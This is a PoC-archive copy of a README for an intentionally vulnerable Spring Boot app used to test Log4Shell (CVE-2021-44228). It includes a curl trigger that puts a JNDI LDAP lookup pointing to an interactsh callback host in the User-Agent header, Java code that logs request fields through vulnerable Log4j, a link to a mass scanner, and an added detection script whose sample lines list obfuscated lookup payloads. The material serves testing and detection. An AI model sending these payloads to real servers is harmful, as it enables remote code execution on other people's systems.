PoC details: 9fc4d2d092e39da3fb9497c72d6a3e2c5e68c1d7

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j contains a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j, and when that request is written to the log, remote code execution is triggered.
Introduction
# CVE-2021-44228 Vuln App

[![Build](https://github.com/ahmad4fifz/CVE-2021-44228-vuln-app/actions/workflows/build.yml/badge.svg)](https://github.com/ahmad4fifz/CVE-2021-44228-vuln-app/actions/workflows/build.yml)

This is a dirty-hack Spring Boot hello-world project for testing your tooling, payloads and detection capabilities locally before you point them at production targets.

The configured Log4j version is 2.13.0, which sits inside the affected range (2.0-beta9 through 2.14.1), so JNDI lookups in logged strings are still resolved.

## Building the docker image
```bash
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```

## Testing / Triggering CVE-2021-44228
If you don't have a Burp Collaborator instance of your own, you can use this site for a similar experience: https://interactsh.com

```bash
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null
```
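On the detection side, here is an added example that is not code from this repository or its author: a small scanner over log lines shaped like the controller's `Request ...: <value>` output. The sample lines are constructed for the example, not captured from a run, and the nested-lookup forms it normalises (`${lower:j}`, `${::-j}`, `${env:X:-j}`) are the widely documented evasions rather than something the README covers.

```python
#!/usr/bin/env python3
"""Added example (not from the CVE-2021-44228-vuln-app project): flag
Log4Shell lookup strings in log lines, including the nested-lookup
obfuscations that hide the literal "jndi".  SAMPLE_LOG is constructed to
resemble what the dummy controller writes; it is not real captured output."""
import re
from typing import List, NamedTuple

# Single-character nested lookups used to rebuild "jndi" at log time:
#   ${lower:j} / ${upper:j}          -> j
#   ${::-j}, ${env:NOPE:-j}, ${x:-j} -> j  (default-value syntax)
NESTED = re.compile(r"\$\{(?:lower|upper):([a-z])\}|\$\{[^{}]*:-([^{}])\}", re.I)

# After normalisation the lookup reads ${jndi:<scheme>:...}; capture the scheme.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


class Hit(NamedTuple):
    line_no: int   # 1-based index into the scanned list
    scheme: str    # ldap, rmi, dns, ... as written by the attacker
    raw: str       # the original, un-normalised line for the analyst


def normalise(s: str) -> str:
    """Collapse nested single-character lookups until the string is stable,
    so ${${lower:j}ndi:...} and ${${::-j}${::-n}${::-d}${::-i}:...} both
    become ${jndi:...}."""
    prev = None
    while prev != s:
        prev = s
        s = NESTED.sub(lambda m: m.group(1) or m.group(2), s)
    return s


def scan(lines: List[str]) -> List[Hit]:
    """Return one Hit per line that carries a JNDI lookup after normalisation."""
    hits: List[Hit] = []
    for i, line in enumerate(lines, 1):
        m = JNDI.search(normalise(line))
        if m:
            hits.append(Hit(i, m.group(1).lower(), line))
    return hits


# Constructed sample: three hits (plain, lower-lookup, default-value chain)
# and two benign lines, one of which contains a harmless ${sys:...} lookup.
SAMPLE_LOG = [
    "INFO HelloController - Request User Agent: curl/7.79.1",
    "INFO HelloController - Request User Agent: ${jndi:ldap://x.interactsh.com/a}",
    "INFO HelloController - Request Body: ${${lower:j}ndi:rmi://x.interactsh.com/a}",
    "INFO HelloController - Request Query String: q=${${::-j}${::-n}${::-d}${::-i}:dns://x.interactsh.com/a}",
    "INFO HelloController - Request Body: price is ${sys:user.home} today",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no}: jndi scheme={hit.scheme} :: {hit.raw}")
```

The normalisation loop is what separates this from a plain `grep jndi`: each pass rewrites one layer of nesting, so arbitrarily deep `${lower:${lower:j}}` chains still resolve before the scheme check runs.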

### Scanner tool
Optionally, you can use this repo for local or mass scanning: https://github.com/adilsoybali/Log4j-RCE-Scanner

### Trigger locations
This vulnerability is all about getting a user-controlled value logged by the vulnerable logging framework. With that in mind, this simple dummy application handles two HTTP verbs (GET and POST) and logs a bunch of request fields, each of which is an injection location:

```java
@GetMapping("/")
public String index(HttpServletRequest request) {
    logger.info("Request URL: " + request.getRequestURL());
    logger.info("Request URI: " + request.getRequestURI());
    logger.info("Request Method: " + request.getMethod());
    logger.info("Request Query String: " + request.getQueryString());
    logger.info("Request Protocol: " + request.getProtocol());
    logger.info("Request Remote Address: " + request.getRemoteAddr());
    logger.info("Request Remote Host: " + request.getRemoteHost());
    logger.info("Request Remote Port: " + request.getRemotePort());
    logger.info("Request User Agent: " + request.getHeader("User-Agent"));
    return "Log4J2 is working!";
}
```

```java
@PostMapping("/")
public String post(HttpServletRequest request, @RequestBody String body) {
    logger.info("Request URL: " + request.getRequestURL());
    logger.info("Request URI: " + request.getRequestURI());
    logger.info("Request Method: " + request.getMethod());
    logger.info("Request Query String: " + request.getQueryString());
    logger.info("Request Protocol: " + request.getProtocol());
    logger.info("Request Remote Address: " + request.getRemoteAddr());
    logger.info("Request Remote Host: " + request.getRemoteHost());
    logger.info("Request Remote Port: " + request.getRemotePort());
    logger.info("Request User Agent: " + request.getHeader("User-Agent"));
    logger.info("Request Body: " + body); // mind the extra request body
    return "Log4J2 is working!";
}
```

Contribution / improvements are welcome.

Sorry for the code quality :) this project is not for show-off but to share and help.
File snapshot

```
[4.0K] /data/pocs/9fc4d2d092e39da3fb9497c72d6a3e2c5e68c1d7
├── [4.0K] app
│   ├── [ 722] build.gradle
│   ├── [4.0K] gradle
│   │   └── [4.0K] wrapper
│   │       ├── [ 54K] gradle-wrapper.jar
│   │       └── [ 200] gradle-wrapper.properties
│   ├── [5.8K] gradlew
│   ├── [2.8K] gradlew.bat
│   ├── [ 998] log4j.xml
│   ├── [9.7K] mvnw
│   ├── [6.2K] mvnw.cmd
│   ├── [1.5K] pom.xml
│   ├── [  33] settings.gradle
│   └── [4.0K] src
│       ├── [4.0K] main
│       │   ├── [4.0K] java
│       │   │   └── [4.0K] com
│       │   │       └── [4.0K] example
│       │   │           └── [4.0K] springboot
│       │   │               ├── [ 829] Application.java
│       │   │               └── [1.9K] HelloController.java
│       │   └── [4.0K] resources
│       │       └── [  53] application.properties
│       └── [4.0K] test
│           └── [4.0K] java
│               └── [4.0K] com
│                   └── [4.0K] example
│                       └── [4.0K] springboot
│                           ├── [ 746] HelloControllerIT.java
│                           └── [1017] HelloControllerTest.java
├── [  76] Dockerfile
├── [1.0K] LICENSE
└── [2.8K] README.md

15 directories, 18 files
```
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the PoC through the source link.
    2. If the source is gone or unreachable, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted the PoC code for you; to keep this maintained long term, please consider paying for the local PoC. Thank you for your support.